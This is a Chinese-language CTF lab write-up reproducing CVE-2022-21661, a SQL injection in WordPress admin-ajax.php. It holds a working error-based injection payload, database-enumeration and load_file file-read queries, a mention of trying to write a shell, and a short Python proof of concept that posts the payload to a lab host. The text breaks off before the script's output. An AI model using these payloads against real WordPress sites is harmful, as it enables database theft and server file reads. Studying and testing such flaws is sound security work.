CVE-2022-21661漏洞复现

CVE-2022-21661漏洞复现

运行环境: 春秋运镜
该漏洞是wordpress 5.8.3以下存在sql注入 /wp-admin/admin-ajax.php处存在sql注入

漏洞复现

一开始根据网上使用的payload进行注入发现不行

后来继续信息搜素，发现需要开启Debug模式后者是添加上传送格式

使用这个payload就可以

action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1)+or+extractvalue(rand(),concat(0x7e, user(),0x7e))#"]}}}

#了解到了报错注入的运行方式
or+extractvalue(rand(),concat(0x7e, user(),0x7e))
# 接下来只要进行修改 user() 位置上的函数即可
# 如果用到select 就需要用到() 详细看后面的请求包

已经找到注入点了后续就可以变得很简单的原先

先查看所有的数据库看看是否存在ctf数据库

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA -- 更改下注入的语句发现 回显过多加上limit

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1

这样用测试器遍历一遍，就可以发现所有的数据库了

发现有

information_schema
cms
mysql
performance_schema
sys

发现没有ctf数据库，一开始以为需要直接登录到后台或者怎么getshell,因为是root权限所以尝试了写shell但是后面发现再使用update更新密码的时候，和直接写文件后是不行的。

然后尝试了这些语句

select load_file('/flag')
mid((select load_file('/flag')),20,32)

但是发现可以读取数据，凭借以往的经验flag会在/flag中，(这一点确实坑如果不提前知道的话，而且平常sql注入的漏洞flag也应该再库里),所以直接读取该文件

select load_file('/flag')
mid((select load_file('/flag')),20,32)
--太长就使用这个一段一段取 原因:报错注入好型只能取32个字符
-- select load_file('/flag')  文件一定要闭合 前面闭合使用了” 导致后面不能使用" 只能使用’
-- 使用" 如 "/etc/passwd" 就不会返回结果

后续继续就可以得到完整的flag了

代码审计

这次的环境直接把源码给我们了，根据已知的了解我们可以开始进行代码审计。

找到问题文件 class-wp-tax-query.php，这里是构建一个查询。具体的我也还在理解 可以参考
WordPress SQL 注入漏洞（CVE-2022-21661 分析与复现） - FreeBuf网络安全行业门户

自己编写的python -poc

用漏洞环境尝试了可以使用，实战还不确定

import requests

url = "http://eci-2ze7dycyugnw92tlgbdk.cloudeci1.ichunqiu.com/"
ext = "/wp-admin/admin-ajax.php"
data = '''action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1)+and+extractvalue(rand(),concat(0x7e,database(),0x7e))#"]}}}'''
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
           "Content-Type": "application/x-www-form-urlencoded"}
url = url.split("/")
url = "/".join(url) + ext
resp = requests.post(url,data=data,headers=headers,verify=False)
print(resp.text)
if resp.text != "0":
    print(url + " is Vulnerable")

返回结果